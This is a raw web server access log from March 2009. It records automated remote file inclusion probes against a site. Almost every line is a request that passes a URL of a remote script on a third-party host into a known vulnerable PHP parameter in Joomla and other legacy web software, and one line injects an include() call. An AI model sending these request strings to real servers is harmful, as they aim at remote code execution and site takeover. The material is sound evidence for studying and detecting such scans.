78.129.138.184 - - [11/Mar/2009:03:07:16 -0500] "GET /logs///administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
78.129.138.184 - - [11/Mar/2009:03:07:16 -0500] "GET /logs/access_log.1231977600///administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
87.249.116.188 - - [11/Mar/2009:03:08:40 -0500] "GET /logs/access_log.1228608000//admin/admin.php?_shop_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
209.126.131.239 - - [11/Mar/2009:03:08:58 -0500] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
209.126.131.239 - - [11/Mar/2009:03:08:58 -0500] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
209.126.131.239 - - [11/Mar/2009:03:08:58 -0500] "GET /logs/access_log.1233446400//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
85.119.154.60 - - [11/Mar/2009:03:09:30 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://hredu.net/bbs/skin/zero_vote/images/idoke.txt???? HTTP/1.0" 404 313 "-""libwww-perl/5.48"
85.119.154.60 - - [11/Mar/2009:03:09:30 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://hredu.net/bbs/skin/zero_vote/images/idoke.txt???? HTTP/1.0" 404 308 "-""libwww-perl/5.48"
200.109.244.212 - - [11/Mar/2009:03:14:29 -0500] "GET /logs/access_log.1228262400 HTTP/1.0" 200 12042 "http://au.search.yahoo.com/search?p=for&meta=""Mozilla/4.0 (compatible; MSIE 5.0b1; Mac_PowerPC)"
195.35.82.155 - - [11/Mar/2009:03:15:21 -0500] "GET /?base_folder=http://internetpc.co.kr/gnr_session/yes.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.810"
195.35.82.155 - - [11/Mar/2009:03:15:26 -0500] "GET /logs/?base_folder=http://internetpc.co.kr/gnr_session/yes.txt??? HTTP/1.1" 200 36689 "-""libwww-perl/5.810"
85.119.154.60 - - [11/Mar/2009:03:16:25 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://hredu.net/bbs/skin/zero_vote/images/idoke.txt???? HTTP/1.0" 404 305 "-""libwww-perl/5.48"
85.119.154.60 - - [11/Mar/2009:03:16:26 -0500] "GET //modules/xfsection/modify.php?dir_module=http://hredu.net/bbs/skin/zero_vote/images/idoke.txt???? HTTP/1.0" 404 300 "-""libwww-perl/5.48"
218.38.55.195 - - [11/Mar/2009:03:20:52 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:03:20:52 -0500] "GET /logs/access_log.1233014400/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:03:20:53 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:03:22:36 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:03:22:36 -0500] "GET /logs/access_log.1233014400/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:03:22:36 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
82.225.232.238 - - [11/Mar/2009:03:34:28 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://internetpc.co.kr/gnr_session/yes.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
82.225.232.238 - - [11/Mar/2009:03:34:28 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://internetpc.co.kr/gnr_session/yes.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
67.18.151.242 - - [11/Mar/2009:03:43:56 -0500] "GET /logs/access_log.1228348800/includes/class_item.php?fileExtension=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
67.18.151.242 - - [11/Mar/2009:03:43:56 -0500] "GET /logs/includes/class_item.php?fileExtension=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.18.151.242 - - [11/Mar/2009:03:43:56 -0500] "GET /includes/class_item.php?fileExtension=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:03:44:29 -0500] "GET /logs/includes/class_item.php?fileExtension=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:03:44:29 -0500] "GET /includes/class_item.php?fileExtension=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:03:44:29 -0500] "GET /logs/access_log.1228348800/includes/class_item.php?fileExtension=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:03:44:37 -0500] "GET /includes/class_item.php?fileExtension=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:03:44:37 -0500] "GET /logs/includes/class_item.php?fileExtension=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:03:44:37 -0500] "GET /logs/access_log.1228348800/includes/class_item.php?fileExtension=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:03:45:32 -0500] "GET /includes/class_item.php?fileExtension=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:03:45:32 -0500] "GET /logs/access_log.1228348800/includes/class_item.php?fileExtension=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:03:45:32 -0500] "GET /logs/includes/class_item.php?fileExtension=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
75.125.182.74 - - [11/Mar/2009:03:46:20 -0500] "GET //include/admin.lib.inc.php?site_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
75.125.182.74 - - [11/Mar/2009:03:46:20 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
75.125.182.74 - - [11/Mar/2009:03:46:20 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.125.182.74 - - [11/Mar/2009:03:46:28 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
64.202.102.41 - - [11/Mar/2009:03:51:41 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
64.202.102.41 - - [11/Mar/2009:03:51:41 -0500] "GET //include/admin.lib.inc.php?site_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
64.202.102.41 - - [11/Mar/2009:03:51:41 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
64.202.102.41 - - [11/Mar/2009:03:51:47 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.232.182.162 - - [11/Mar/2009:03:52:17 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.823"
72.232.182.162 - - [11/Mar/2009:03:52:18 -0500] "GET //modules/xfsection/modify.php?dir_module=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.823"
67.76.163.60 - - [11/Mar/2009:03:57:19 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
67.76.163.60 - - [11/Mar/2009:03:57:19 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.76.163.60 - - [11/Mar/2009:03:57:29 -0500] "GET /logs/access_log.1231977600//modules/vwar/admin/admin.php?vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.76.163.60 - - [11/Mar/2009:03:57:29 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.225.232.238 - - [11/Mar/2009:03:58:34 -0500] "GET /?base_folder=http://internetpc.co.kr/gnr_session/yes.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
82.225.232.238 - - [11/Mar/2009:03:58:38 -0500] "GET /logs/?base_folder=http://internetpc.co.kr/gnr_session/yes.txt??? HTTP/1.1" 200 181175 "-""libwww-perl/5.79"
74.52.100.226 - - [11/Mar/2009:03:59:11 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
74.52.100.226 - - [11/Mar/2009:03:59:11 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.43.201.9 - - [11/Mar/2009:04:00:39 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.scs.edu/webmaster/MADONGCMD.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
69.43.201.9 - - [11/Mar/2009:04:00:39 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.scs.edu/webmaster/MADONGCMD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
209.126.131.239 - - [11/Mar/2009:04:00:57 -0500] "GET /logs/access_log.1233014400//administrator/components/com_artlinks/config.artlinks.php?mosConfig_absolute_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 368 "-""libwww-perl/5.805"
209.126.131.239 - - [11/Mar/2009:04:00:57 -0500] "GET /logs//administrator/components/com_artlinks/config.artlinks.php?mosConfig_absolute_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
209.126.131.239 - - [11/Mar/2009:04:00:57 -0500] "GET //administrator/components/com_artlinks/config.artlinks.php?mosConfig_absolute_path=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
66.194.251.253 - - [11/Mar/2009:04:02:10 -0500] "GET //skin/zero_vote/error.php?dir=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.194.251.253 - - [11/Mar/2009:04:02:10 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.194.251.253 - - [11/Mar/2009:04:02:10 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.194.251.253 - - [11/Mar/2009:04:02:48 -0500] "GET /logs/access_log.1230595200//skin/zero_vote/error.php?dir=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.18.151.242 - - [11/Mar/2009:04:13:44 -0500] "GET /logs/access_log.1232755200//bbshop/shop/index.php?_shop_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
67.18.151.242 - - [11/Mar/2009:04:13:44 -0500] "GET //bbshop/shop/index.php?_shop_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
67.18.151.242 - - [11/Mar/2009:04:13:45 -0500] "GET /logs//bbshop/shop/index.php?_shop_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.18.151.242 - - [11/Mar/2009:04:14:03 -0500] "GET /logs/access_log.1228608000//bbshop/shop/index.php?_shop_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:04:14:57 -0500] "GET //bbshop/shop/index.php?_shop_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:04:14:58 -0500] "GET /logs/access_log.1232755200//bbshop/shop/index.php?_shop_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:04:14:59 -0500] "GET /logs//bbshop/shop/index.php?_shop_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:04:15:13 -0500] "GET /logs/access_log.1228608000//bbshop/shop/index.php?_shop_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.231.24.164 - - [11/Mar/2009:04:17:57 -0500] "GET /logs/access_log.1232755200//bbshop/shop/index.php?_shop_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.231.24.164 - - [11/Mar/2009:04:17:57 -0500] "GET //bbshop/shop/index.php?_shop_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.231.24.164 - - [11/Mar/2009:04:18:00 -0500] "GET /logs//bbshop/shop/index.php?_shop_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.177.8.135 - - [11/Mar/2009:04:18:21 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.scs.edu/webmaster/MADONGCMD.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.812"
81.177.8.135 - - [11/Mar/2009:04:18:22 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.scs.edu/webmaster/MADONGCMD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
222.231.24.164 - - [11/Mar/2009:04:18:45 -0500] "GET /logs/access_log.1228608000//bbshop/shop/index.php?_shop_path=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
89.111.176.28 - - [11/Mar/2009:04:20:04 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.111.176.28 - - [11/Mar/2009:04:20:05 -0500] "GET //include/admin.lib.inc.php?site_path=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
89.111.176.24 - - [11/Mar/2009:04:21:29 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.scs.edu/webmaster/MADONGCMD.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
89.111.176.24 - - [11/Mar/2009:04:21:29 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.scs.edu/webmaster/MADONGCMD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
74.205.119.226 - - [11/Mar/2009:04:27:09 -0500] "GET /logs//bbshop/shop/index.php?_shop_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:04:27:09 -0500] "GET //bbshop/shop/index.php?_shop_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:04:27:10 -0500] "GET /logs/access_log.1232755200//bbshop/shop/index.php?_shop_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:04:27:15 -0500] "GET //bbshop/shop/index.php?_shop_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:04:27:15 -0500] "GET /logs/access_log.1232755200//bbshop/shop/index.php?_shop_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:04:27:15 -0500] "GET /logs//bbshop/shop/index.php?_shop_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:04:27:17 -0500] "GET /logs/access_log.1228608000//bbshop/shop/index.php?_shop_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:04:27:20 -0500] "GET /logs/access_log.1228608000//bbshop/shop/index.php?_shop_path=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.232.110.178 - - [11/Mar/2009:04:34:22 -0500] "GET /logs//apboard/portal.php/add.php?APB_rp=http://www.neokimchi.com/english/vote.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
218.232.110.178 - - [11/Mar/2009:04:34:23 -0500] "GET //apboard/portal.php/add.php?APB_rp=http://www.neokimchi.com/english/vote.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
75.125.182.74 - - [11/Mar/2009:04:42:18 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.125.182.74 - - [11/Mar/2009:04:42:18 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.125.182.74 - - [11/Mar/2009:04:42:18 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
75.125.182.74 - - [11/Mar/2009:04:42:18 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
64.202.102.41 - - [11/Mar/2009:04:43:43 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.202.102.41 - - [11/Mar/2009:04:43:43 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.202.102.41 - - [11/Mar/2009:04:43:43 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
64.202.102.41 - - [11/Mar/2009:04:43:49 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:04:52:24 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:04:52:24 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:04:52:24 -0500] "GET /logs/access_log.1232150400//include/admin.lib.inc.php?site_path=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:04:52:25 -0500] "GET /logs/access_log.1232928000//include/admin.lib.inc.php?site_path=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.221.130.2 - - [11/Mar/2009:05:00:07 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.221.130.2 - - [11/Mar/2009:05:00:07 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.221.130.2 - - [11/Mar/2009:05:00:07 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
77.221.130.2 - - [11/Mar/2009:05:00:48 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [11/Mar/2009:05:00:48 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [11/Mar/2009:05:00:48 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
207.226.88.17 - - [11/Mar/2009:05:01:44 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:05:01:44 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
77.221.130.2 - - [11/Mar/2009:05:02:34 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
77.221.130.2 - - [11/Mar/2009:05:02:34 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
77.221.130.2 - - [11/Mar/2009:05:02:34 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.38.55.195 - - [11/Mar/2009:05:05:26 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:05:05:27 -0500] "GET /logs/access_log.1233014400/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:05:05:27 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:05:07:33 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:05:07:33 -0500] "GET /logs/access_log.1233014400/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:05:07:33 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
